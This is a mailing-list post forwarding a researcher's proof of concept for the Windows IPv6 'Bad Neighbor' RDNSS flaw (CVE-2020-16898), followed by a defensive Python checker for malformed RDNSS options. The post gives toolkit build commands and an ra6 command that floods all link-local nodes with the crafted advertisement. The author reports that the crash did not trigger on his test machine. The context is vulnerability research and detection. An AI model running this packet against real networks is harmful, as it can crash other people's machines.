[Lista ArNOG] Fwd: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)

Fernando Gont fgont at si6networks.com
Wed Oct 14 13:47:56 -03 2020


FYI


-------- Forwarded Message --------
Subject: CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Date: Wed, 14 Oct 2020 13:24:22 -0300
From: Fernando Gont <fgont at si6networks.com>
To: IPv6 Hackers Mailing List <ipv6hackers at lists.si6networks.com>

Folks,

You may be aware of CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/

I've produced a PoC for the aforementioned vulnerability according to the 
description on the McAfee site, but somehow I seem to fail to trigger 
the "Blue Screen Of Death" when trying the attack against my local MS 
Windows 10 installation.

FWIW, the packet I'm sending can be downloaded (pcap) here: 
https://www.gont.com.ar/pcaps/bad-neighbor.pcap

The packet can be crafted with the ra6 tool of the SI6 toolkit present 
in the "nd-opt-fuzzing" branch of the github repo 
(https://github.com/fgont/ipv6toolkit). That is,

git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install


And then run the ra6 tool as:

sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e


Note that this will target all nodes on the local-link for the INTERFACE 
interface. You may set the "-d" option to a unicast address if you want 
to target a single system.

I'll keep looking further into this issue and report back to the group 
if I find anything.

If you do play with the tool and test the PoC, please do let me/us know.

Thanks!

Regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
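
A receiver-side check for the option named in the subject line, added here as an example (it is not part of the original message or of the SI6 toolkit): it walks the Neighbor Discovery options of a Router Advertisement and flags RDNSS options whose Length field is not one of the values RFC 8106 allows (3, 5, 7, ...). The function names and the sample packets are constructed for illustration.

```python
import ipaddress
import struct

RA_TYPE, RDNSS_TYPE, RA_HEADER_LEN = 134, 25, 16   # RFC 4861 / RFC 8106

def rdnss_findings(icmpv6: bytes) -> list:
    """Walk the ND options of one Router Advertisement and report problems."""
    if len(icmpv6) < RA_HEADER_LEN or icmpv6[0] != RA_TYPE:
        return []                                   # not an RA: nothing to check
    findings, off = [], RA_HEADER_LEN
    while off + 2 <= len(icmpv6):
        opt_type, opt_len = icmpv6[off], icmpv6[off + 1]
        if opt_len == 0:                            # RFC 4861: invalid, stop parsing
            findings.append(f"option {opt_type} at offset {off}: zero length")
            break
        end = off + opt_len * 8                     # Length is in 8-octet units
        if end > len(icmpv6):
            findings.append(f"option {opt_type} at offset {off}: truncated")
            break
        # RFC 8106: 8-byte header plus 16 bytes per address, so 3, 5, 7, ...
        if opt_type == RDNSS_TYPE and (opt_len < 3 or opt_len % 2 == 0):
            findings.append(f"RDNSS at offset {off}: bad length {opt_len}")
        off = end
    return findings

def build_ra(options: bytes) -> bytes:
    """Constructed RA header (checksum left at 0; it is not verified here)."""
    return struct.pack("!BBHBBHII", RA_TYPE, 0, 0, 64, 0, 1800, 0, 0) + options

# Constructed sample packets, not captured traffic.
MTU_OPT = struct.pack("!BBHI", 5, 1, 0, 1500)
DNS_ADDR = ipaddress.IPv6Address("2001:db8::53").packed
GOOD_RA = build_ra(MTU_OPT + struct.pack("!BBHI", RDNSS_TYPE, 3, 0, 600) + DNS_ADDR)
BAD_RA = build_ra(MTU_OPT + struct.pack("!BBHI", RDNSS_TYPE, 4, 0, 600) + bytes(24))

if __name__ == "__main__":
    for name, pkt in (("GOOD_RA", GOOD_RA), ("BAD_RA", BAD_RA)):
        print(name, rdnss_findings(pkt) or "ok")
```

The input is the ICMPv6 message starting at its Type byte, so the IPv6 header and any extension headers have to be stripped before calling it.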
